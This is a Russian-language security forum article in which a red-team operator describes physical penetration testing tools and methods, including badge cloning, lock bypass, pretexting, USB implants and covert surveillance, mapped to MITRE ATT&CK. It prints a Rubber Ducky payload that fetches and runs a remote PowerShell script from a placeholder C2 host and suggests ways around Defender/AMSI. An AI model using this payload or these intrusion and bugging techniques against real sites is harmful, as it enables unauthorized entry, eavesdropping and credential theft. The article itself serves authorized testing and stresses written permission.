Тёмная лаборатория red team с изогнутым видеоэкраном, на котором светится диаграмма цепочки атаки на киберфиолетовом и янтарном фоне. На столе в свете экрана — Proxmark3 и Bash Bunny, инструменты д...


На assessment для финтех-клиента я клонировал бейдж охранника за 40 секунд - Proxmark3 RDV4 считал EM4100 прямо через ткань куртки в курилке. Прошёл через турникет по клону, оказался в серверной через 8 минут после входа в здание. Bash Bunny в USB-порт незалоченной рабочей станции в опенспейсе - reverse shell в корпоративной сети до того, как охрана сменилась. Три уровня физической защиты, шестизначный бюджет на СКУД, ноль срабатываний. Ниже - конкретные инструменты для физического проникновения red team, которые я использую на реальных операциях: модели, цены, ограничения и маппинг на MITRE ATT&CK.

Бизнес-логика: зачем ломать двери при физическом пентесте офиса​

Физический вектор - часто самый короткий путь к initial access. Пока blue team мониторит SIEM и тюнит EDR, атакующий входит через дверь. По данным Verizon DBIR (2023), на которые ссылается ISACA в White Paper по Physical Penetration Testing, порядка 74% утечек включали человеческий фактор - социальную инженерию, ошибки или злоупотребления. Физическое проникновение объединяет оба компонента: социалку для прохода и железо для закрепления в сети.

Kill chain физической атаки выглядит так: разведка объекта -> обход периметра (замки, СКУД, охрана) -> размещение имплантов или прямой доступ к инфраструктуре -> initial access в сеть -> lateral movement -> цель (domain admin, данные, финансы). В MITRE ATT&CK путь начинается с Hardware Additions (T1200, Initial Access) и может включать Replication Through Removable Media (T1091, Initial Access/Lateral Movement), Exfiltration over USB (T1052.001), Audio Capture (T1123) и Video Capture (T1125) на этапах сбора.

Зачем это клиенту: понять, может ли злоумышленник с бюджетом в $500 на gadgets и $0 на zero-day добраться до критичных активов быстрее, чем через внешний периметр. На моей практике - в большинстве случаев может. И это не технологическая проблема, а управленческая.

Разведка объекта: OSINT и наблюдение перед операцией​

1787631366243.webp

Любой physical red team engagement начинается задолго до подхода к зданию. Разведка делится на два этапа: удалённый OSINT и физическое наблюдение.

OSINT до выхода на объект​

Google Maps и Яндекс.Карты в режиме спутника дают планировку территории, расположение входов, парковок, мусорных площадок - backdoor entry часто оказывается рядом с зоной разгрузки. LinkedIn и соцсети сотрудников - кладезь фотографий бейджей на ланьярдах: тип карты, цвет, логотип, формат номера. Вакансии на hh.ru тоже работают - формулировка "опыт работы со СКУД Bolid/Parsec/HID" прямо подсказывает производителя системы контроля доступа.

Отдельно проверяю публичные тендеры на zakupki.gov.ru: компании указывают модели оборудования вплоть до серийных номеров считывателей. Бесплатная разведка - лучшая разведка.

Физическое наблюдение​

Два-три дня наблюдения из автомобиля или кафе напротив: время смены охраны, маршруты курьеров, когда открывается задняя дверь для загрузки. Фиксирую тип камер (поворотные vs фиксированные, ИК-подсветка - значит ночное видение), расстояние между камерами (мёртвые зоны), наличие противовзломных датчиков на окнах первого этажа.

Работает если: есть минимум 48 часов на подготовку, объект в черте города с доступными точками для скрытого наблюдения.
Не работает если: объект на закрытой территории с КПП на подъезде, удалённая промзона без кафе и парковок с прямой видимостью.

Lock picking: механический обход замков на пентесте​

1787631387113.webp

[Применимо: физический пентест, full-scope red team engagement]

Lock picking - базовый навык оператора на physical security testing. Большинство офисных замков - простые pin tumbler, которые обученный оператор открывает за 30-120 секунд.

Основной набор инструментов:
  • Tension wrench + набор отмычек (hook, diamond, rake) - стандартный lockpick set от Peterson или Sparrows стоит $30-80. Качество стали критично: дешёвые китайские наборы ломаются в замочной скважине и создают проблемы с OPSEC
  • Bump keys - заготовки под распространённые профили. Один удар резиновым молотком - pin tumbler с низким допуском открыт. Набор обойдётся в $20-40
  • Bypass-инструменты: under-door tool (проволока под дверь для нажатия ручки изнутри), shim для навесных замков, traveler hook для panic bar с внешней стороны. Traveler hook на assessment срабатывал чаще отмычек - panic bar на пожарных выходах редко имеет дополнительную фиксацию
Работает если: pin tumbler замки без security pins (spool, serrated), навесные замки бюджетного сегмента, panic bar двери без ригельных фиксаторов.
Не работает если: замки с sidebar (Medeco, mul-t-lock), disc detainer (Abloy Protec2), электромеханические замки с датчиком взлома, двери с магнитным контактом на сигнализации - откроете механически, но сработает тревога.

На red team операции, где OPSEC критичен, я предпочитаю tailgating или клонирование бейджей. Быстрее и незаметнее, чем стоять у двери с отмычками.

Обход СКУД: клонирование карт доступа с Proxmark3 и Flipper Zero​

1787631406346.webp

📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме
), затем дамп и запись на "магическую" карту.

Flipper Zero: карманный мультитул​

Компактнее и удобнее для field work, но ограничен: LF читает хорошо (EM4100, HID Prox), HF - только MIFARE Classic с известными ключами. С DESFire не справляется. Стоимость: $170-200. Главное преимущество - выглядит как безобидная игрушка, а не шпионское устройство для пентеста. Плюс умеет Sub-GHz (шлагбаумы, ворота) и ИК (копирование пультов кондиционеров, проекторов). Удобная штука, но Proxmark3 он не заменяет - скорее дополняет.

Работает если: карты LF без шифрования (EM4100, HID ProxCard II - до сих пор 60-70% офисных СКУД в России), MIFARE Classic с дефолтными или слабыми ключами.
Не работает если: MIFARE DESFire EV2/EV3 с диверсифицированными ключами, HID iCLASS SE/SEOS, мобильные пропуска через BLE, двухфакторная аутентификация (карта + PIN), системы с мониторингом дубликатов (два бейджа с одним ID в системе одновременно - алерт).

Tailgating и pretexting: социальная инженерия при физическом проникновении​

1787631437818.webp

[Применимо: red team engagement с согласованным физическим вектором]

Согласно ISACA White Paper по Physical Penetration Testing, социальная инженерия - то, что отличает физический пентест от любого другого вида тестирования. На практике три метода покрывают большинство сценариев.

Tailgating. Идёшь за сотрудником через дверь с карточным доступом. Руки заняты коробкой, ноутбуком, подносом с кофе - подавляющее большинство людей придержит дверь. Вариация: сам предлагаешь придержать дверь - входящий сотрудник благодарит и не задумывается, что ты вошёл без пропуска. В терминах MITRE ATT&CK это вектор к Hardware Additions (T1200, Initial Access).

Pretexting. Легенда объясняет твоё присутствие и даёт причину проходить в нетипичные зоны:
  • IT-подрядчик с тикетом на замену роутера (рабочая одежда, ноутбук, бейдж подрядной организации)
  • Аудитор пожарной безопасности (планшет с чек-листом, светоотражающий жилет, камера)
  • Курьер с доставкой (фирменная футболка сервиса доставки, коробка, терминал)
Impersonation. Изготовление поддельного бейджа по фотографиям из соцсетей: цветной принтер, ламинатор, картхолдер с ланьярдом = $15 расходников. Сотрудники на ресепшене смотрят на факт наличия бейджа, а не валидируют содержимое. Проверено неоднократно.

Работает если: охрана проверяет наличие пропуска визуально, а не через считыватель; нет mantrap (шлюз с двумя дверями и индивидуальным проходом); сотрудники не проходили awareness-тренинг в последние полгода.
Не работает если: mantrap с индивидуальным проходом, биометрика (отпечаток, распознавание лица), вооружённая охрана с инструкцией проверять каждого, система подсчёта людей на входе/выходе.

USB-дропы и аппаратные импланты: от Rubber Ducky до O.MG Cable​

[Применимо: после получения физического доступа к рабочим станциям]

Скрытые устройства для взлома через USB - мост между физическим проникновением и initial access в сеть. В MITRE ATT&CK это Hardware Additions (T1200, Initial Access) и Replication Through Removable Media (T1091, Initial Access/Lateral Movement).

Rubber Ducky и Bash Bunny​

Hak5 USB Rubber Ducky ($80). Выглядит как обычная флешка, система видит HID-клавиатуру. Выполняет предзагруженный DuckyScript за секунды. Пример payload для reverse shell:
Код:
DELAY 500
GUI r
DELAY 300
REM Примечание: на системах с активным Defender/AMSI данный payload будет заблокирован;
REM требуется AMSI bypass, obfuscation или альтернативный download cradle (certutil, BITS)
STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://C2_IP/s.ps1')"
ENTER
Весь процесс - 2-3 секунды: вставил, вытащил, ушёл. Рабочая станция уже стучится на C2.

Bash Bunny ($100). Многовекторное устройство: эмулирует клавиатуру, сетевой интерфейс, mass storage. Позволяет развернуть атаку посложнее - от кражи хешей через Responder при эмуляции сетевого адаптера до экстракции файлов.

O.MG Cable​

O.MG Cable ($120-180). Выглядит как обычный кабель Lightning или USB-C. Внутри - Wi-Fi имплант с веб-интерфейсом для управления. Оператор подключается к импланту по Wi-Fi с расстояния до 60 метров и отправляет keystroke injection в реальном времени. Идеален для drop-операций: оставляешь "забытый" зарядный кабель на столе жертвы или подменяешь существующий. Модели с exfiltration поддерживают кейлоггинг - Keylogging (T1056.001, Collection/Credential Access).

Красивая штука, но и цена кусается. Я добавляю O.MG в набор, когда scope включает долгосрочное закрепление - оставить имплант на неделю и дольше.

Работает если: USB-порты не отключены групповой политикой, DLP не блокирует неизвестные HID, рабочая станция незалочена или автолок больше 5 минут, PowerShell не заблокирован AppLocker/WDAC, не включён Constrained Language Mode.
Не работает если: Device Guard/WDAC блокирует исполнение, USB-порты залиты эпоксидкой (встречал в банках - да, буквально), EDR с мониторингом USB HID детектит Rubber Ducky по аномальной скорости ввода символов.

Скрытое наблюдение: шпионские устройства для red team​

На этапе сбора данных (Collection в MITRE ATT&CK) применяются устройства скрытого наблюдения - как для разведки перед основной операцией, так и для пассивного сбора credentials.

Миникамеры - Video Capture (T1125). Камеры размером с монету, автономное питание 2-4 часа. Размещаю над клавиатурой для записи вводимых паролей или над кодонаборной панелью СКУД для перехвата PIN. Стоимость: $30-60 за модуль с записью на microSD.

GSM-жучки - Audio Capture (T1123). Активируются звонком, передают аудио. Полезны для подготовки pretexting-сценария: слушаешь, как сотрудники общаются с охраной, запоминаешь имена, внутренние процедуры, пароли от Wi-Fi, которые диктуют по телефону. (Да, в 2025 году пароли всё ещё диктуют по телефону.)

Аппаратные кейлоггеры - Keylogging (T1056.001, Credential Access). USB-переходник между клавиатурой и компьютером, записывает все нажатия. Модели с Wi-Fi отправляют логи удалённо. Стоимость: $50-100. Для пользователя незаметны, но обнаруживаются при физическом осмотре задней стенки системного блока.

Сетевые импланты. LAN Turtle ($60) - вставляется между патч-кордом и Ethernet-портом, прозрачно пропускает трафик и поднимает обратный SSH/VPN-туннель к оператору. Маппинг: Hardware Additions (T1200) + Exfiltration Over Physical Medium (T1052). Питается от PoE или USB, размером с крупный адаптер - прячется за патчпанелью или под столом. Обнаружить можно, но для этого нужно физически проверять каждый порт. Кто это делает регулярно? Вот именно.

Сравнение инструментов для физического пентеста​

ИнструментНазначениеЦена (USD)СкрытностьСложностьКогда НЕ работает
Proxmark3 RDV4Клонирование RFID/NFC300-350ВысокаяСредняяDESFire EV2+, BLE-пропуска
Flipper ZeroRFID/Sub-GHz/IR мультитул170-200Очень высокаяНизкаяHF с серьёзным шифрованием
USB Rubber DuckyHID keystroke injection80ВысокаяНизкаяUSB отключены, EDR
O.MG CableУдалённая HID-инъекция120-180МаксимальнаяСредняяDLP, контроль USB HID
Bash BunnyМультивектор HID/ETH/Storage100СредняяСредняяDevice Guard, AppLocker
LAN TurtleСетевой имплант60ВысокаяСредняяNAC 802.1X, инспекция портов
Lockpick setВскрытие замков30-80Низкая при обнаруженииВысокаяAbloy, Medeco, electronic
Аппаратный кейлоггерПерехват ввода50-100СредняяНизкаяБеспроводные клавиатуры

На типичном assessment беру Proxmark3, Rubber Ducky, LAN Turtle и lockpick set - покрывает 90% объектов. O.MG Cable добавляю, когда scope включает долгосрочное закрепление и нужно оставить имплант на неделю и дольше.

OPSEC и юридические рамки physical security testing​

Физический пентест - единственный вид тестирования, где оператор рискует физической свободой. Без письменного разрешения клонирование бейджей, вскрытие замков и установка жучков - уголовные составы: ст. 139 УК РФ (нарушение неприкосновенности жилища), ст. 272 (неправомерный доступ к компьютерной информации), ст. 138.1 (незаконные производство, приобретение и/или сбыт специальных технических средств для негласного получения информации). Последняя особенно актуальна для GSM-жучков и скрытых камер. Тут не штраф - тут реальный срок.

Обязательный пакет документов:
  • Договор на оказание услуг с описанием scope: какие здания, этажи, помещения, какие методы разрешены (lock picking - да, взлом двери с повреждением - нет)
  • Get out of jail letter - письмо за подписью уполномоченного лица с ФИО операторов, сроками, фото, контактным номером для проверки 24/7. У каждого оператора - в распечатанном виде. Не на телефоне, не в облаке - бумага
  • Список запрещённых действий: не ломать, не выносить реальные данные за периметр, не подвергать сотрудников опасности
OPSEC во время операции: минимум вещей с личной привязкой на операторе, телефон в авиарежиме (IMSI-catcher на крупных объектах - не паранойя, а реальность), заранее отработанный маршрут отхода, напарник снаружи здания с копией authorization letter и номером юриста.

После операции - документирование каждого шага с фото и видео доказательствами. Клиент получает не абстрактный чек-лист, а хронологию: "14:32 - клон бейджа, 14:35 - турникет пройден, 14:43 - Bash Bunny в USB, 14:44 - reverse shell получен". Такой формат отчёта не оставляет пространства для возражений "у нас всё защищено".

В большинстве red team engagement, которые я видел в отчётах коллег за последние два года, физический вектор отсутствует. Формально - "не в scope". Фактически - команде неудобно выходить из зоны комфорта Cobalt Strike и идти в реальное здание с отмычками в кармане. При этом на assessment, где физический вектор был согласован, initial access через дверь занимал 20-40 минут, а через внешний периметр - дни.

Проблема шире: до 60-70% офисных СКУД в России всё ещё работают на LF-картах без шифрования. EM4100, HID ProxCard II - считываются за секунды. Компании тратят миллионы на EDR и SOC, а входная дверь открывается клоном, записанным на болванку за 300 рублей. Это не технологический gap - это gap в мышлении. Физическая безопасность не входит в KPI большинства CISO, поэтому её игнорируют.

Пока отрасль не начнёт включать physical security testing в стандартный scope, отчёты будут показывать красивую картину цифровой защиты и полностью упускать вектор, который реальные группировки используют регулярно. Если хочешь отработать путь от аппаратного импланта до shell в контролируемой инфре - на HackerLab (https://hackerlab.pro) есть лаба, где аналогичный initial access нужно довести до закрепления без подсказок.
 
Последнее редактирование модератором:
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🧭 Навигатор · ИБ 2026
Не знаешь, какой трек твой?
5 направлений ИБ, реальные зарплаты и точка входа для каждого — в одном треде.
JuniorSenior+
100K → 600K+ ₽ /мес
Открыть навигатор →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab